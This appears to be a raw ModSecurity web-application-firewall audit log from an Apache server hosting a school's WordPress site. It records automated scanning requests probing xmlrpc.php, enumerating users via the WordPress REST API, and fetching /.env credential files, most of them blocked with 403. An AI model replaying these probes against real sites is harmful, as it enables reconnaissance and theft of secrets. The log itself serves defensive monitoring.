ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a458501b-Z-- --e8cfe00c-A-- [08/May/2025:19:15:29 +0700] aBygYSs5rYyn3jlLjjIVGAAAAMo 103.236.140.4 47948 103.236.140.4 8181 --e8cfe00c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.169 X-Forwarded-Proto: http Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e8cfe00c-C-- demo.sayHello --e8cfe00c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8cfe00c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746706529906342 5009 (- - -) Stopwatch2: 1746706529906342 5009; combined=3871, p1=467, p2=3203, p3=26, p4=25, p5=89, sr=65, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8cfe00c-Z-- --36f82c06-A-- [08/May/2025:19:15:43 +0700] aBygb8P9GxxPAbCroFYsmgAAAEM 103.236.140.4 47952 103.236.140.4 8181 --36f82c06-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.169 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --36f82c06-C-- demo.sayHello --36f82c06-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --36f82c06-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746706543463691 7003 (- - -) Stopwatch2: 1746706543463691 7003; combined=5030, p1=655, p2=4023, p3=42, p4=50, p5=190, sr=85, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36f82c06-Z-- --2561c568-A-- [08/May/2025:19:38:00 +0700] aBylqMP9GxxPAbCroFYsowAAAEE 103.236.140.4 48266 103.236.140.4 8181 --2561c568-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.88.161.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.88.161.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2561c568-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2561c568-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746707880755251 3256 (- - -) Stopwatch2: 1746707880755251 3256; combined=1382, p1=472, p2=876, p3=0, p4=0, p5=33, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2561c568-Z-- --b78e230e-A-- [08/May/2025:19:44:05 +0700] aBynFacs1DvJ_HgMHE9fEgAAAAA 103.236.140.4 48286 103.236.140.4 8181 --b78e230e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b78e230e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b78e230e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746708245528976 3468 (- - -) Stopwatch2: 1746708245528976 3468; combined=1516, p1=532, p2=946, p3=0, p4=0, p5=38, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b78e230e-Z-- --fadc493d-A-- [08/May/2025:20:10:05 +0700] aBytLacs1DvJ_HgMHE9glQAAAAY 103.236.140.4 49180 103.236.140.4 8181 --fadc493d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fadc493d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fadc493d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746709805628556 3158 (- - -) Stopwatch2: 1746709805628556 3158; combined=1383, p1=488, p2=858, p3=0, p4=0, p5=37, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fadc493d-Z-- --6ae44b28-A-- [08/May/2025:20:10:10 +0700] aBytMqcs1DvJ_HgMHE9glwAAAAs 103.236.140.4 49184 103.236.140.4 8181 --6ae44b28-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.76 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6ae44b28-C-- demo.sayHello --6ae44b28-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ae44b28-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746709810664049 4925 (- - -) Stopwatch2: 1746709810664049 4925; combined=3944, p1=479, p2=3266, p3=23, p4=26, p5=88, sr=93, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ae44b28-Z-- --2c036d47-A-- [08/May/2025:20:28:48 +0700] aByxkKcs1DvJ_HgMHE9gpgAAAAw 103.236.140.4 49300 103.236.140.4 8181 --2c036d47-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 66.187.172.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 66.187.172.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2c036d47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c036d47-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746710928082279 3349 (- - -) Stopwatch2: 1746710928082279 3349; combined=1416, p1=478, p2=905, p3=0, p4=0, p5=32, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c036d47-Z-- --c0aed912-A-- [08/May/2025:20:33:24 +0700] aByypKcs1DvJ_HgMHE9grAAAAAc 103.236.140.4 49318 103.236.140.4 8181 --c0aed912-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://smkn22-jkt.sch.id Host: smkn22-jkt.sch.id X-Real-IP: 156.239.217.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.239.217.4 X-Forwarded-Proto: https Connection: close Origin: https://smkn22-jkt.sch.id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c0aed912-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0aed912-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746711204033960 3252 (- - -) Stopwatch2: 1746711204033960 3252; combined=1406, p1=496, p2=878, p3=0, p4=0, p5=32, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0aed912-Z-- --9781074f-A-- [08/May/2025:20:37:27 +0700] aByzlys5rYyn3jlLjjIVNQAAAMY 103.236.140.4 49350 103.236.140.4 8181 --9781074f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 149.88.24.163 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 149.88.24.163 X-Forwarded-Proto: https Connection: close user-agent: python-httpx/0.13.3 accept: */* --9781074f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9781074f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746711447242802 858 (- - -) Stopwatch2: 1746711447242802 858; combined=385, p1=348, p2=0, p3=0, p4=0, p5=37, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9781074f-Z-- --ab212e79-A-- [08/May/2025:20:54:52 +0700] aBy3rI4K347NtBcwXKxg_wAAAJc 103.236.140.4 49446 103.236.140.4 8181 --ab212e79-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 118.91.171.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.91.171.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ab212e79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab212e79-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746712492547371 5510 (- - -) Stopwatch2: 1746712492547371 5510; combined=2582, p1=813, p2=1720, p3=0, p4=0, p5=49, sr=172, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab212e79-Z-- --f2653e57-A-- [08/May/2025:21:02:00 +0700] aBy5WKcs1DvJ_HgMHE9gwQAAABA 103.236.140.4 49492 103.236.140.4 8181 --f2653e57-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3890.0 Safari/537.36 Accept-Charset: utf-8 --f2653e57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2653e57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746712920035356 793 (- - -) Stopwatch2: 1746712920035356 793; combined=318, p1=279, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2653e57-Z-- --e381191f-A-- [08/May/2025:21:02:26 +0700] aBy5co4K347NtBcwXKxhAwAAAIY 103.236.140.4 49494 103.236.140.4 8181 --e381191f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.70 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e381191f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e381191f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746712946984267 3936 (- - -) Stopwatch2: 1746712946984267 3936; combined=1545, p1=586, p2=921, p3=0, p4=0, p5=38, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e381191f-Z-- --fa44b977-A-- [08/May/2025:21:02:32 +0700] aBy5eKcs1DvJ_HgMHE9gwgAAABU 103.236.140.4 49498 103.236.140.4 8181 --fa44b977-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.70 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fa44b977-C-- demo.sayHello --fa44b977-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa44b977-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746712952020797 5154 (- - -) Stopwatch2: 1746712952020797 5154; combined=3987, p1=468, p2=3300, p3=29, p4=31, p5=93, sr=69, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa44b977-Z-- --b9515c53-A-- [08/May/2025:21:06:03 +0700] aBy6S8P9GxxPAbCroFYsvgAAAE8 103.236.140.4 49560 103.236.140.4 8181 --b9515c53-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 159.89.127.165 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 159.89.127.165 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --b9515c53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9515c53-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746713163596611 774 (- - -) Stopwatch2: 1746713163596611 774; combined=307, p1=269, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9515c53-Z-- --11feb02c-A-- [08/May/2025:21:08:06 +0700] aBy6xsP9GxxPAbCroFYsyAAAAFQ 103.236.140.4 49600 103.236.140.4 8181 --11feb02c-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 138.197.191.87 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 138.197.191.87 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --11feb02c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11feb02c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746713286621617 791 (- - -) Stopwatch2: 1746713286621617 791; combined=309, p1=275, p2=0, p3=0, p4=0, p5=34, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11feb02c-Z-- --0b64100a-A-- [08/May/2025:21:08:56 +0700] aBy6-I4K347NtBcwXKxhFAAAAIc 103.236.140.4 49614 103.236.140.4 8181 --0b64100a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 77.95.193.130 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 77.95.193.130 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0b64100a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b64100a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746713336962267 2827 (- - -) Stopwatch2: 1746713336962267 2827; combined=1224, p1=431, p2=764, p3=0, p4=0, p5=29, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b64100a-Z-- --7d2f3b11-A-- [08/May/2025:21:13:23 +0700] aBy8A6cs1DvJ_HgMHE9hMAAAABM 103.236.140.4 50542 103.236.140.4 8181 --7d2f3b11-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7d2f3b11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d2f3b11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746713603325618 3086 (- - -) Stopwatch2: 1746713603325618 3086; combined=1316, p1=461, p2=812, p3=0, p4=0, p5=43, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d2f3b11-Z-- --4d738301-A-- [08/May/2025:21:13:28 +0700] aBy8CKcs1DvJ_HgMHE9hMgAAAAA 103.236.140.4 50550 103.236.140.4 8181 --4d738301-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.211 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4d738301-C-- demo.sayHello --4d738301-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d738301-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against 